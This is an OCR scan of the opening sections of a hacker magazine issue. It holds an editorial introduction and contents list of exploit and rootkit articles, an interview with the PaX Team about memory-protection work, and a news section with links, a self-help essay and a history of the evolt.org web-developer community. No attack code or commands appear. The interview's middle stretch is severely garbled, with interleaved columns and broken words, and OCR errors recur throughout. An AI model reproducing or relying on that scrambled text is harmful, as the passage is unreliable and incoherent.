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==Phrack Inc.== 


Volume Ox0d, Issue 0x42, Phile #0x01 of Oxl1l 


[ Introduction ] 


[ By The Circle of Lost Hackers ] 


Let’s imagine a man, sitting on the Moon and looking down to this 
75S-water-25%-ground Planet. He doesn’t know anything about us. Neither we 
do about him, but that’s another story, maybe another Intro. 


He sees this Internet madness going on down there. He sits and watches. 


"This is not different from your favourite bar", a guy behind our man says 
in a smile. 


Down there a bunch of bar tenders provides connections to everybody. They 
earn their life out of that, so every so often they just scrappy down 
their service. There’s water in my drink, sir, and there’s a strange rate 
of packet loss on my P2P traffic. There are a bunch of gangsters: they 
want to control the business, they want to know who does what and they try 
to shut down whoever is not okay with that. We have cleaned their faces, 
put them on TV and we keep on calling them politicians. Good luck with 
your laws, we’ll find our way out, somehow. There are beautiful girls, 
there are married couples, there are young guys, there are usual and 
occasional customers. Everybody is down there, everybody has his own 
chance to tell his story. If you’re getting to this bar for the first 
time, you might spot some guys that are just different. You can’t say why, 
but there’s something. It doesn’t matter if they are married, young, old, 
musicians, workers, even bartenders, this is just the outside. There’s 
another life, behind that, it’s now so-damn-clear that they’re just trying 
to keep a balance with it. 


"You used to be one of them, didn’t you ?" 


Our man-on-the-moon asks, looking at the guy. But there’s no need of an 
answer, he is just different. You can’t say why, but there’s something. 
Somebody once told me that Heaven is on the Moon. 


"What’s your name again ?" 
"Cliph.™ 


[ I don’t know in what you believe or even if you believe. In the end, it 
doesn’t really matter. This is not a story about science or religion or 
humanity, this is a Good-Bye. To a friend.. ] 


het [ Phrack Issue #66 


Welcome to Phrack, by the community, for the community. 


Its with an incredible pleasure that we present you our newly released 
issue 


Phrack Magazine #66 


For this release, we are gracious to be interviewing the Pax 

Team, whose work has made significant evolutionary and revolutionary 
advances in security. This is a radical change from the Phrack Prophile 
in issue #65 where the prophile was about the UNIX terrorist. 


Some could easily detect in this shift a certain seek for identity from 
the Phrack staff. As if the identity of Phrack had to be refined at all. 
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In the previous prophile, we had interviewed probably the most hated 
"black hat" hacker, and in the current prophile, the most hated "white 
hat" hacker. Perceived as such. But the reality is more faded and every 
hacker has this paradoxical identity where each side of the barrier 
suddenly become very familiar to the other. And this is where the great 
hacker shall remain. 


Phrack keeps its identity. A magazine for all hackers, by all hackers. 


The Hacker culture. 


[To the very firsts who don’t believe in the virtue of the Underground, I 
answer: 


Kill the underground, you won’t kill the Hacker culture. 


We are mourning one of the best hackers of recent time today. His spirit 
and contributions will remain part of the Hacker culture. We dedicate this 
issue of Phrack to Cliph, who left us really too early this year. Cliph 
did influence all kernel exploit writers in the last 5+ years with his 
advances on exploiting the Linux kernel. 


---------- [ Phrack Issue #66 : what you were waiting for 


We have the great pleasure to release today another excellent selection of 
the best Hacking articles this year. An issue full of new exploitation 
techniques and ground work on writing attack software. 


0x01 Introduction TCLH 

0x02 Phrack Prophile on The PaxX Team TCLH 

0x03 Phrack World News TCLH 

0x04 Abusing the Objective C runtime Nemo 

0x05 Backdooring Juniper Firewalls Graeme 

0x06 Exploiting DLmalloc frees in 2009 Huku 

0x07 Persistent BIOS infection -aLS & 
Alfredo 

0x08 Exploiting UMA : FreeBSD kernel heap exploits Argp & Karl 

0x09 Exploiting TCP Persist Timer Infiniteness Ithilgore 

OxOA Malloc Des-Maleficarum Blackngel 

OxO0B A Real SMM Rootkit Core collapse 

OxOC Alphanumeric RISC ARM Shellcode Y.Younan & 
P.Philippaerts 

OxO0D Power cell buffer overflow BSDaemon 

OxOE Binary Mangling with Radare Pancake 

OxOF Linux Kernel Heap Tempering Detection Larry H. 

0x10 Developing MacOSX Rootkits Wowie & 
Ghalen 

Oxll How close are they of hacking your brain ? Dahut 


[=] [=] 


This issue has some evil number.. with a lot of evil content. Phrack 
proves once more how we can, every year, push the state of the art further 
its known limits. Some of these exploits articles are really innovative 
and we are proud to be able to release those contributions in our columns. 
Some others bring their values on different architectures. So, check out 
how to attack the Objective C runtime, the latest Linux heap allocator, 

the FreeBSD kernel heap management system. A special paper is the one of 
Black about explaining and giving more insights and code on the 
groundbreaking work previously released as the Malloc Maleficarum 
technique(s). Black did rework his article quite a lot since the first 
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version he did, and we were impressed by the 


evolution. This will 


certainly help the younger audience to persevere in the realm of heap 


overflow exploitation in the most recent restrictive heap management 
implementations on Linux. We also have articles on alphanumeric ARM 
shellcode (long standing work) and exploiting the PowerCell architecture. 


Thats indeed a lot of exploitation. 


Beside exploit writing, we propose to you a couple of rootkits papers. 
Graeme shared his experience on backdooring Jupiner firewalls : check out 
the article for all details. Our friends from Argentina finished their 
stub just before the release and we could integrate their very first 
article about persistent BIOS infection. Other advances at the lowest 
level are also presented by the article of Core collapse, where he 
demonstrates how to make use of the System Management Mode interrupts ina 


real SMM rootkit. For more intermediate hack 


rs of the OsX world, a nice 


state of the art article on OsxX backdoors are given is the end of the 
issue, as an easy read. Its always good to have this kind of code ready to 


be used when you need it. 


Finally, as it always happen in Phrack, we have those articles that don’t 
match with the others. This is the case of our single revers ngineering 


= 


article in this issue, presenting the RADARE 


framework. RADARE is really 


an interesting tool, and some of its features are better explained with a 


tutorial like this one. Check out the RADARE 
documentation and to grab the latest code. P 


website for a more complete 


ancake and the RADARE team are 
always committing new stuffs in there and the 


list of supported features 


is impressive, and the scripting language really flexible and expressiv 


for low level operations on binary files. 


Another special article is the one of Ithilgore about exploiting weakness 


in the TCP protocol. This is a great article, 


an innovative work we would 


like to s more often proposed for publication in Phrack. We still don’t 
realiz ntirely how far Phrack is breaking through by providing all those 


technical details about the most alternative 


techniques. 


We were previously talking of PaX and evolutionary changes, we have an 


article discussing kernel heap security, and 


how it can be made more 


resistant to attack. It has been rare to find mitigation articles in 
Phrack, but its not the first time this has happen, nor will it be the 
last. Sometimes, mitigation articles also contains some useful information 
for the exploit writer. Sometimes, offensive articles also contains some 


useful information for defense purposes. 


Finish up your mind by reading the paper on Hacking your Brain, a 


refreshing cyberpunk inspired work by Dahut. 


In the hope that your neural plugs were not wired in vain. 


-— The Phrack staff 


[ Greets for issue #66 


We’d like to thank (in no particular order): 


- PaX team —- karl 

— Graeme - Ithilgore 

— nemo — blackngel 

— Huku — core collapse 
- .aLs - Y.Younan 

- Alfredo - P.Philippaerts 
—- argp —- BSDaemon 


for their contributions. Without them, this i 
it is. 


If you see something that you would like cove 


— pancake 
—- Larry H. 
— Wowie 

—- Ghalen 
— Dahut 


ssue would not be as good as 


red, but is not / has not 


been recently, do some research and send us an article. Have you came 
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up with a better mouse trap? Share it with the world. Phrack lives via 
the contributions made by the community. 


Hasta luego, 


Phrack para siempre. 


[ 


] 
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==Phrack Inc.== 


Issue 0x42, Phile #0x02 of Oxl1l 


| 

[ PHRACK PROPHILE ON ] | 

| 

[ pipacs ] | 

| 

=---=[ Specifications 
Handle: pipacs 
AKA: Pax Team 
Handle origin: your pick between P. Howard and images.google.com :;) 


Produced in: 


-hu 


Urlz: pax.grsecurity.net 
Computers: always a generation behind... 
Creator of: Pax 
Member of: PaX Team :) 
Projects: Pax 
Codez: ntid 
Active sinc 15+ years 


Inactive since: 


past few years 


|=---=[ Favorites 
Actors: Chaplin 
Films: Versus 
Authors: Gurdjieff 
Books: Fire from within 
Novel: Jonathan Livingston Seagull 
Meeting: eclipse’ 99 
Music: Radioaktivitaet, The light of the spirit 
Alcohol: long island iced tea 
Cars: Maserati 
Foods: anything but 4 legs 
I like: good beer & wine 
I dislike: all that bitter ’beer’ down under :P 


=---=[ Your current life in a paragraph 


Working on some PHP/.net/js stuff for a SaaS startup, 


and generally 


tired of everything security related. Fortunately there’s life beyond 


that :). 


First contact with computers 


Despite the early 80’s behind the iron curtain and COCOM restrictions, 


I somehow 


It was Z-80 and BASIC, but one had to start somewhere 
came a ZxX- 


Passions 


Unsolved problems. 


managed to get my hands on an ABC-80 during a summer camp. 
;). Afterwards 
81, the usual stuff in those days. 


a Spectrum, etc, 


What makes you tick 


Unsolvable problems. 


Entrance in the underground 


I’m not sure I was ever part of the underground but let’s just say that 
many of the smart people I met in the mid-90’s would later end up in 
computer security as a necessary outgrowth of skills they acquired in 
revers ngineering. To me they’re still the friends of 10+ years and 
there’s nothing particular about being part of the underground (ok, 

did i successfully ditch the question? :). 


Which research have you done or which one gave you the most fun? 
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Te! Ss. 0£ 


were porting it to new CPUs whil 


ap hes 


that NX 


course Pax, 


bit on ppc32 again? 


How you got started on low-level concepts? 


In the ZX Spectrum days I wanted to stop the clock in some game, 


there I was learning 2-80 assembly and finding that pesky dec 
From then on it was lots of assembly coding for the Spectrum 
loader after all these years :) 
ly the PC. 


proud of my own turbo 
(m68k) 


Amiga 


Interestingly, 
I had to clean up a 
ever got 


and final 


I real 


:), I final 


EeCVEES 


virus incident I sti 
everything first). 


betw 


ngineer more stuff, 


revers 


I 

t 
deve 
e 
down 
level 


runtime 


he commercial sector 


There will 
Side user] 
Think web browsers, 
of programmable engines which represent 
(shel 


ngin 


code generation 


at a higher abstraction lev 


will be adaptable or not is an open question, 


ly hated the PC 
fter a virus infection (the first and only one I 
ly gave in and learned x86 as well and began to 
ver since that 
ll have the habit of unpacking and looking at 

That then led to a never ending cat&émouse game 

n debuggers and anti-debugging techniques, 
r and fix my choice of a debugger, 
major undertaking in hindsight but it taught me a lot about CPU detail 
that proved very useful in later years. 


(x86) 


especially some 6 years ago when spender and me 
le solving unsolvable problems 


so 


(hl). 
(still 
then later the 


after the m68k but when 


particularly 


x 


Thoughts on future of security enhancements? 


packers ( 


SoftICE. 


etc, 
th 


1 also be more work towards hardening parts of the cl 
land that is both powerful and 
media players, 


to research and 


lcode) did 


to be addressed soon. 


Short history of Pax? 


At arou 


a startup to develop a HIPS for windows. 


the end 
while e 
what I 


on the path. 


do a wi 


of kernel internals). 


name, 
other i 


The 
one 
out 
new 


Then came public discl 
but decided I wasn’t going to go down the patent road. 
it was the right decision, 


I was a 


limited 


the fence you are :). 


nd the tim 


for several reasons, 


summer betw 


sam 


but the idea stuck into my head and 


njoying th 


n two jobs, 


I somehow remembered 


so I had to eventuall 
That was a 


think we’ll see more of them as now there’s very serious push in 
(mostly due to Microsoft) 
lop practically useful techniques. 
nhancements and also more kernel and hypervisor level work to lock 
various parts of the software stack and also to provide some 
of self-protection. 


There will be more tool chain 


lient 
most exposed to attacks. 
that all implement some form 
kind of problems as 
in the previous decades, 
Whether techniques developed so far 

but this problem needs 


just 


when the Y2K panic was settling down I got into 
That didn’t work out in 


had read about a year ago on IA-32 TLB hacking and I was set 


nterests. 


bit crazy to 


by my free time, 


losure day, 


(un) fortunately 
For a mor 


I talked to a few friends about it and we decided to 
ndows version as that’s what we were familiar with 
This is also the reason for the 
even if the other guys dropped out soon afterwards to pursue 


‘team’ 


The following years saw slow but steady dev 


even if many peopl 
let this out for free 


xpected. 


timelin 


precis 


(speaking 
in the 


summer passed and I got a new job where linux was everywhere and 
October weekend I sat down and figured I’d give it a try. 
that the first cut wasn’t that hard and I was surprised that the 
kernel booted without a hitch and worked as 


Turned 


lopment of various ideas, 
(depending on which side of 
just look at the 


(where’s 


LY 


LS 


something I had debated for some time 
I still think 
le thought and still think 
oo es 
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wikipedia article, I think my years spent in (sometimes voluntary) 
unemployment will clearly stand out :). 


What future things are planned for Pax? 


I wish I could just even list them :), but having looked at my to-do 
list it seems I’ve got enough work left to fill more than a lifetime. 


So without any particular preference, here’s a few ideas that I hope 
I can implement one of these days: 


Ret2libc prevention: this is something I’d written about 6 years ago 
but never got to implement it, and somewhat shamefully, the world at 
large failed to as well (save for MSR’s Gleipnir project perhaps). 

I mean, all the effort people spent in the last decade on propolice/ssp 
could have equally been spent on solving this much more relevant and 
important problem... 


Kernel self-protection: the goal here is to solve the somewhat 
unsolvable problem of the kernel protecting itself from its own bugs. 
What is or isn’t possible is something you’ll have to wait and see :). 


More arch support: it would be nice if more CPU specific features could 
be ported to other archs beyond x86, in particular ARM (android, mobile 
phones) and MIPS (network gear) really need all the protection they can 
get. 


Virtualization support: whether it’s a good idea or not from a security 
point of view, virtualization is here to stay and unfortunately quite a 
few of the existing kernel self-protection features are hard to handle 
in those environments. I’m not yet sure what concessions can be made 
NETS res 


Personal general opinion about the underground 


I don’t know much about it given how many years ago I lost most of my 
interest in computer security, but I can’t help but note that the 
barrier of entry is set a lot higher than in the previous century. 
Couple that with vested new interests (both commercial, governmental 
and criminal, with unclear boundaries at times :P) in siphoning off 
all the knowledge and people in security and I can see no bright 
future for the kind of underground that there was before... 


I just hope that the spirit of not taking anything at face value, 
looking behind and beyond of what is already known will not die out in 
the younger generations and some of them will keep their independence 
for long enough to nurture underground outlets as this one :). 


Memorable Experiences 


Meeting the internet in the early 90’s when the whole country was 
connected on a 9.6 kbps line to Vienna. 


Downloading IDA 2.x in ’94 and not knowing what to do with it at 
first (anyone remembers ReSource on the Amiga? :). 


Playing with SMM back in 1998, I keep wondering when Probe Mode gets 
‘discovered’ and hyped up as well :). 


Eclipse’ 99. 
That ADMcon. 


Being told by several native (english) speakers that I have a french 
accent :P. 


Seeing the AMD ’anti virus protection’ ad on the London tube in the 
summer of 2004 and realizing I may have had something to do with it. 
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2005, vomatron with a prince of Sri Lanka, you can blame PaX on him 
too. 


BAcon 06, the first and original one. 


Padocon. 


Teaching half the world to pronounc ge’szse’getekre (blame the lack 
of proper accents on Phrack mandated ASCII :P). 


Having to endure snoring from all kinds of people :). 
=---=[ Memorable people you have met 

People who worked on icedump. 

The wonderful team of Q. 


People who helped with Pax. 
The Padocon folks who got a tad bit drunk on palinka. 


=---=[ Memorable places you have been 
All over the world except Antarctica. 
=---=[ Things you are proud of 


= 


Revers ngineering SoftICE to the point that some NuMega folks 
reportedly thought their src got stolen or something. 


Learning amd64 and porting a pure asm kernel driver to XP 64 RC and 
revers ngineering and circumventing PatchGuard (a year before 
Uninformed had published anything on it) all in 4 weeks while also 
handling an lkml flamewar and being jetlagged down under... 


=---=[ Things you are not proud of 
Some would say it’s all the things I’m proud of :). 


Oh, and sorry for having held up this release, but life’s just too 
busy... 


=---=[ Opinion about security conferences 


Too much hype over too little content. But then there’r xceptions. 


Fortunately most are organized enough that presentations are available 
online with many academic confs being the exception, shame on them. 
Nevertheless, it seems that I still managed to collect over 16 GB of 
(security) conference material over the years so I guess the situation 
is not that bad. I wish I had time to read all that though :). 


=---=[ Opinion on Phrack Magazine 1985’ ? 1995’ ? 2005’ ? ’2009 ? 


1985: I wish we had had a phone line to begin with :) 
1995: the days when gopher was being taken over by http, and no 


encryption in sight... anyway, I think p47 was the first issue I 
got my hands on, and I didn’t find it too interesting at the time, 
sorry :) 


2005: that’d be p63 I guess (your version, that is :), a whole lot more 
stuff, and finally beyond the 100th how-to-backdoor-linux kind of 
article 

2009: I have yet to see, it didn’t leak so far (kudos for the new team :) 


=---=[ What you would like to see published in Phrack ? 


More hardware related hacking, there’re way too many gizmos out there 
these days to be ignored... 
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More specific uses of computers, such as aviation, space, astronomy, 
particle physics, etc. There must be interesting things hiding there. 


More food-for-thought kind of articles, it’s somehow got neglected... 
=---=[ Shoutouts to specific (group of) peoples 


The old folks from UCF and other groups, all the Q people and those I 
met through them, and basically everyone I drank a beer with :). 


=---=[ Flames to specific (group of) peoples 


It’s all in the search engines already, for the better or worse :). 
=---=[ Quotes 
On some sunny day in July 2002 (t: Theo de Raadt): 


<cloder> why can’t you just randomize the base 

<cloder> that’s what PaX does 

<t> You’ve not been paying attention to what art’s saying, or you don’t 
understand yet, either case is one of think it through yourself. 
<cloder> whatever 


Only to see poetic justice in August 2003 (ttt: Theo again): 


<miod> more exactly, we heard of pax when they started bitching 
<ttt> miod, that was very well spoken. 


More recently, a student contemplating doing research related to 
PaX/grsecurity: 


<xxx> So Dr. Spafford essentially told me that it’s better to work on something 
Simpler than to try to do research that will save the world 


=---=[ Anything more you want to say 


While most of the readers are undoubtedly living a computer dominated 
life, let me remind everyone that you can’t have beer over th 


internet. So go get out sometimes and maybe even invite the neighbour 
over. For this is what builds real relationships, not electronic 
substitutes. 


—------- [ EOF 
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==Phrack Inc.== 


Volume Ox0d, Issue 0x42, Phile #0x03 of Oxl1l 


[ Phrack World News] 
[ by TCLH ] 


The Circle of Lost Hackers is looking for any kind of news related to 
security, hacking, conference report, philosophy, psychology, surrealism, 
new technologies, space war, spying systems, information warfare, secret 
societies, ... anything interesting! It could be a simple news with just 
an URL, a short text or a long text. Feel fr to send us your news. 


We didn’t get any news from the Underground since our last phrack issue, 
it means that one more time all the news reports are coming from 
friends of our’s. 


It would be good if people who claim themself "underground" would send 
us their news... 


Is our underground dead? (apparently yes...) 


ray 


Speedy Gonzales news 
Hacker hack thyself 
3. Evolt.org Marks a Decade 
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*—-[ Phrack 64 0xll is about the french scene and not a sellout conference... 


http://www.frhack.org/history.html 


x*—-[ Promise, we are safe... ] 


http://www.opednews.com/articles/1/US-Spying--Main-Core-PRO-by-Ed-Encho-090202-224 .html 


*-[ Is the Pentagone secure? ]- 
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http://online.wsj.com/article/SB124027491029837401.html 


*-[ Finally, someone is reasonable...]- 


http://www.securityfocus.com/blogs/1908 


x*—-[ Because we love it ] 


http://cryptome.org/ 


*-[ Silvio is back in the business ]- 


http://silviocesare.wordpress.com/ 
http://silvio.cesare.googlepages.com/ 


*-[ Because it is funny ]- 


http://www.encyclopediadramatica.com/index.php/The_Unix_Terrorist 
http://www.encyclopediadramatica.com/GOBBLES 
http://www.encyclopediadramatica.com/N3td3v 


*-[ They should know everyone is working for Phrack ]- 


http://archives.neohapsis.com/archives/fulldisclosure/2009-01/0324.html1 


*=|[ Ten, years Late. sj 


http://www.dtors.org/papers/malicious-—code-injection-via-dev-mem. pdf 


*-{ Fedwire Funds Transfer System ]- 


http://www. federalreserve.gov/paymentsystems/coreprinciples/coreprinciples.pdf 
www.ists.dartmouth.edu/library/216.pdf 
http://www. fedwiredirectory.frb.org/search.cfm 


--[ 2. "Hacker Hack Thyself" ]-- 
by Kartikeya Putra <alienbaby@freaknetwork.in> 


"All human beings, all persons who reach adulthood in the world today are 
programmed biocomputers. None of us can escape our own nature as 
programmable entities. Literally, each of us may be our programs, nothing 
more, nothing less." 


-- John C. Lilly, Programming and Metaprogramming in the Human Biocomputer 


In the early 1970’s, during the early days of Artificial Intelligence 
research, scientists from the fields of psychology and computer science cam 
together to try to develop a new model of how the mind works. Their efforts 
eventually resulted in the discipline now known as Cognitive Science. One of 
the more significant books to come out of this early collaborative effort 
was called Scripts, Plans, Goals and Understanding by Roger Schank and 
Robert Abelson, which is still used by psychologists today to support what’s 
called the Information Processing Model of human cognition. I’d suggest that 
anyone with a serious interest in revers ngineering themselves should hunt 
down a used copy of this out-of-print book (try bookfinder.com, or your 
local library). In it, the authors suggest that human thought is based on a 
set of scripts (programs) for meeting personal goals in different 
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situations. Th xample they use throughout the book is a "Restaurant 
Script" that tells people how to behave when eating out in public, in order 
to meet the goal of getting fed. What would you do if you ordered a 
hamburger and the waitress brought you a hot dog? Your scripts tell you how 
to handle this situation, what to do when the bill comes, and how to handle 
all the other transactions that take place in the restaurant environment. 


Scripts People Live by Claude Steiner is a book about a form of 
pop-psychology called Transactional Analysis. Here the author talks about 
how everyone has a sort of running "life script" which is basically the 
story of your own life as you like to tell it. Inside this script there are 
recurring roles that are often learned in childhood, which inform us how 
people are supposed to behave. I doubt that anyon ver reaches adulthood 
with a completely accurate script of their own life story -- but if you can 
become conscious of your script, it’s possible to start improving it and 
improving the way you write it as you go along. 


Some of our most basic programming concerns what it means to be "good" or 
"bad." When parents, teachers and other authorities are training us how to 
be "good," often this has very little to do with doing what is right and is 
more about training us to behave in ways that are convenient for them. Today 
he task of programming "reality" has substantially been taken over by 
elevision, which is like a mindcontrol device that sits in the living room, 
ypnotizing a legion of glassy-eyed zombies. It is sponsored by corporations 
ho are not concerned with anything except selling their products. In one of 
y favorite commercials on TV right now, this blonde dude -- who looks to me 
ike he knows he is about to become a complete tool -- holds up a McDonald’s 
hicken sandwich and proclaims, "Let’s hear it for nonconformity!" Are you 
idding me? It’s so phony it’s almost avant garde. Andy Warhol would love it 
—-- I find it disturbing. I know that there must be a lot of people out there 
who don’t see anything wrong with this ad -- and others who even buy into it, 
who think that eating a chicken sandwich for breakfast really is 
"revolutionary." 


a 0 oS So ot ct 


When we were teenagers, some of us correctly perceived the system as a 
hypocritical crock of shit and said, "screw this, I’m out of here." As an 
adult with a little perspective now I can see that there’s nothing wrong 
with wanting to do your own thing, but rebellion against the system is still 
a part of it. Maybe we found a peer group who claimed to represent "the 
resistence," the anti-system but it’s a trick, the anti-system is still 
part of the system. By joining it you think you are becoming free, but it’s 
just a trick. As an "outsider," if you break laws or do things that hurt 
yourself or others, you’re just playing in to the role the system wants you 
to play -- you’re doing exactly what you are supposed to do as an "outsider." 
The anti-system system is there because they need "bad guys," so that they 
can play the "good guys" in comparison. If you are good and not one of them, 
the whole system collapses. That is revolutionary! 


The foundation on which this whole sado-masochistic world system is erected 
is the perception of yourself as a victim. A lot of people are starting to 
figure this out, and when that number reaches a certain tipping point it is 
going to alter the structure of the matrix. Seeing yourself as the world’s 
victim is profoundly disempowering and keeps you locked in a cycle of 
self-created pain and misery. We break fr from this cycle by making a 
conscious decision to accept complete responsibility for our own reality. 
Get a copy of The Anger Habit Workbook by Carl Semmelroth and study it like 
a bible. Drs. Barry and Janae Weinhold have an excellent series of six 
e-books titled Breaking Free From the Matrix. There are a lot of wonderful 
books out there to help us take control of our minds and emotions and break 
free from the matrix of social power -- find them, and free your mind. 


-[ 3. Evolt.org Marks a Decade ]- 
by mstrix 


1998 : ORIGINS 
1998-2000 :: RAPID GROWTH 
2000-2002 GROWING FLAMES 
2003-2005 SEEKING BALANCE 
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2006-2008 :: FACING INERTIA 
2008 AND :: OUR FUTUR 


GJ 


The internet is the most reliable machine ever made. 
It’s made from imperfect, unreliable parts, connected 
together, to make the most reliable thing we have." 

— Kevin Kelly, Wired founder 


Evolt.org is a world community for web developers and other internet 
professionals. We host discussion lists, publish articles on our 
website, and maintain a browser archive offering downloads of everything 
from Mosaic to Flock. From the beginning, our community has been 
international, anarchistic, and volunteer-run. If there is one thing 
that makes us stand out from other web development organizations, it has 
been our long-term focus on cultivating community. Yet as much as we 

have worked together, evolt.org’s history is marked by heated turf 
battles interspersed with periods of inertia. We have struggled for 
years to find a balance between process, production, leadership and 
decentralization, while steadfastly maintaining our ideals and 
integrity. On December 14, 2008, evolt.org turns ten years old. 


This is the story of our first decade, from the perspective of someone 
who has been a part of evolt.org since the early days. 


1998 : ORIGINS 


Evolt.org began as a 1998 copyright dispute between Wired Digital’s 
Webmonkey and some members of Webmonkey’s web dev discussion list, 
monkeyjunkies. The high-volume list had been operating since 1997. 
Active monkeyjunkies members wanted an online list archive, so they 
could search for and reference past posts, but Wired (who had recently 
been purchased by Lycos) did not provide one. When one member, Dan Cody, 
as a service to fellow list members, published his own archive of the 
list, Wired’s attorneys ordered him to stop, explaining they were 
reserving their rights to the list posts. Wired further explained that 
they hoped to post the archives at a later date, and include banner ads. 

A number of the community raised a protest, and on December 14, about 
thirty people from the monkeyjunkies community left Webmonkey to form 
their own community-run list, and later, website, evolt.org. 


Evolt.org was both an emulation of, and a response to, Wired Digital and 
Webmonkey. Pre-Lycos Webmonkey featured a regular staff of writers and 
web developers living and working in San Francisco, California, 
producing articles that were both informative and humorous. Silly 
analogies and crazy story lines made tech tutorials entertaining and 
accessible. Advertising was always prominent; in fact, Wired founder 
Kevin Kelly, has said that Wired "co-invented the banner ad." 
Monkeyjunkies, the mailing list, almost seemed an afterthought, 
bolstered no doubt by the magnetic draw of the groundbreaking sites with 
which it was associated. 


Evolt.org began not with a website, nor with an organizational 
structure, but with thelist, a general web development list, in the vein 
of monkeyjunkies, but non-corporate, non-commercial, and archived 
online. Some of the original evolters had internet community experience 
going back to usenet, and more than anything, it was the idea of 
creating an online "community" to which they were drawn, and the idea 
that web developers could assist each other, peer to peer, ona 
worldwide basis. 


In addition to the attention paid to a community-oriented model, 
evolt.org distinguished themselves from Wired and other corporate web 
development sites by eschewing advertising. Finally, evolt.org would not 
claim copyright on anything written by any of its contributors, beyond 
what is granted by the contributor when he or she publishes on an 
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evolt.org list or site. In the spirit of open source, we were, and are, 
"a world community for web developers, promoting the mutual free 
exchange of ideas, skills and experiences." 


1998-2000 : RAPID GROWTH 


Evolt.org members organized themselves entirely through email at first, 
with direction taking place on the admin list, which was archived, but 
closed to all but admins. 


Our main web development list, thelist, was up and running by early 
1999, and by June we were also running a content-managed site to which 
members could submit, rate, and comment on articles posted into several 
"centers" or web development categories. Adrian Roselli offered his 
personal collection of browsers, and thus browsers.evolt.org was born. 
The admin group maintained systems, managed development, and acted as 
editors, still with no formalized structure. Some members would gather 
to code the CMS and other applications at codefests. Later we would 
gather for purely social purposes as well (aka "beervolts.") Admins 
worked hard at everything from evangelizing to coding to creating 
content. List and site traffic grew rapidly. 


2000-2002 : GROWING FLAMES 


In early 2000, Webmonkey experienced an exodus of editorial staff, and 
later that year, monkeyjunkies shut down, with scores of displaced 
"monkeys" moving to evolt.org’s thelist. Things were going great for 
evolt.org. 


We tended to organize ourselves by list. After thelist was 
well-established, thechat began in 2001 as a place to chat about 
anything that was neither related to evolt.org or the web development 
business: “imagine yourself round a table in a pub." Admins continued 
to communicate with each other via a closed list. In late 2000 admin 
began a new list for issues specific to the website. This new list, 
thesite, was open to all interested evolt.org members. 


In early 2001, about a dozen the evolt.org admin group gathered at the 
SXSW interactive conference in Austin, Texas. The group included members 
from both US coasts, the midwest, Texas, the UK, and Iceland. It was 
cozy, with a dozen of us sharing two hotel rooms. And it was at this 
time that we began to attempt to organize ourselves into something 
resembling a traditional non-profit organization. We elected a board of 
directors; Dan Cody was elected chairman. 


Shortly thereafter, the admin group broke out into a series of power 
struggles. 


While we had been able to do a certain amount of big-picture planning in 
Austin, it was difficult to keep track of things once we had spread out 
again. We were still communicating mostly by email (on- and off- lists), 
by phone, and occasionally by IRC chat (a challenge, since we were 
spread over so many timezones worldwide), with rare face-to-fac 
meet-ups as folks were able. However we ran repeatedly into walls, since 
we all came from different cultures, we weren’t all always the best 
communicators, and our vision wasn’t always consistent. Trying to make a 
motion and vote on it was an often cumbersome (and sometimes divisive) 
practice. 


As 2001 drew to a close, the evolt.org admin community had many 
challenges to face, not the least of which was "process." How do you 
govern yourselves when you are unable to sustain a traditional 
organizational structure, and when can’t meet face to face? 
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In early 2002 the organization learned that Dan was personally 
supporting evolt.org’s site and high-bandwidth browser archive at the 
rate of $1000 a month. Many were concerned becaus volt.org wanted to 
be able to survive as an organization regardless of whether any one 
member were available to shoulder his or her portion of the load. Long 
term survival of the organization became a key concern, known in 
shorthand as "the bus question." If any one of us were hit by a bus, how 
would the rest of us make it? Unfortunately, the ongoing discussion 
around power and leadership issues caused such a rift in the admin group 
that Dan Cody, our first and last official leader, resigned in May 2002. 


Remaining members continued to struggle with organizational and 
financial issues. By this point, several of those elected in Austin had 
resigned posts for one reason or another. For the rest, it seemed that 
the offices held no real meaning in the context of evolt.org. 


In search of order, we divided ourselves into committees, and continued 
attempting to establish voting and other processes. The closed admin 
list dissolved, and long-term planning moved to newer openly-archived 
list called "theforum." Seeking order, we hoped to solve some of the 
boundary and accountability issues that had led to the fracturing of the 
community. Yet the quest for process and organization itself became 
frustrating to many, because it often seemed like the majority of our 
energy was being spent on process and power issues rather than on 
achievement and moving forward as a group. At the same time, world 
events from the dot com crash to 9/11 to the 2003 US-led invasion of 
Iraq fueled emotional responses to exisiting tensions. Once thriving, 
thechat erupted in flames, then slowed down considerably. 


2003-2005 : SEEKING BALANCE 


By 2003, evolt.org had over 3,000 members subscribed to thelist. We 
continued to maintain the browser archive, and a community web resource 
directory, and for the past year and a half, had been offering all our 
members fr web hosting as well. We still had essentially no budget, 
though by this point fundraising had become a serious focus. In 2003 
evolt.org stopped offering free webhosting, and we finally allowed some 
google ads to be placed on our browser archive in order to help pay for 
our hosting costs. 


Eventually most of the committees and smaller lists were shut down, and 
their duties folded back into theforum. We continued publishing 
articles, and hosting our main lists, but discontinued the directory. 
Meanwhile, it was becoming increasingly clear that evolt.org’s custom 
Cold Fusion-based CMS was vulnerable to the bus scenario. By 2004 we 
were down to one active CMS developer/webhost (lists.evolt.org at the 
time, was hosted the UK). As always, the heavy amount of responsibility 
taken on by a single person became a concern to others in the 
organization. The group voted to move out of our custom CMS and into an 
established open-source CMS, Drupal. We found low-cost dedicated hosting 
at The Planet, and mirrors helped relieve some of the bandwidth pressure 
on the browser archive. The new Drupal-driven site went live in 2005. 


We had finally managed to decentralize evolt.org to the point that it 
could survive the sudden departure of any one of its caretakers. 
Ironically, the rocky road to that place resulted in the loss of some 
high-contributing admins. 


As for governing structure, evolt.org ultimately settled on an ad hoc 
consensus process. One of us will propose an idea to theforum, ask if 
there are objections, and wait a few days for responses. If there are no 
objections, one assumes consensus and moves forward. If there are 
objections, we try to talk through them, rather than fight. Also, we 
are no longer concerned with formalizing a hierarchy. 


Those who have lasted through the years have progressed a great deal in 
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their ability to work together. While we still face communication 
challenges, we are more familiar with the territory now. 


2006-2008 : INERTIA 


As evolt.org admin has worked to put our organization in order, web 
progress has lagged. The patched-together 2005 design was intended to be 
temporary, but has yet to be replaced. In 2006 there was a failed 
movement toward redesign, and by 2008 our article submissions and web 
traffic had dropped noticeably. Activity on thelist remained steady, but 
at a lower volume than in years past. 


2008 AND : OUR FUTURE 


As we move forward into our tenth year, a few large projects lie before 
us. We are taking a step back, looking at how we are serving our 
community, and asking how we can do better. To that end we are surveying 
our community for input. In addition, we continue to work on improving 
our browser archive by adding more mirrors, and hopefully also adding 
more information about some of our unique and interesting browsers. 
Finally, we are taking steps toward truly internationalizing our site, 
so that we have the foundation on which to build localized versions of 
evolt.org, a vision we’ve had, but kept on the backburner, since 2001. 


Though the journey has been far from smooth, we’ve managed to maintain 
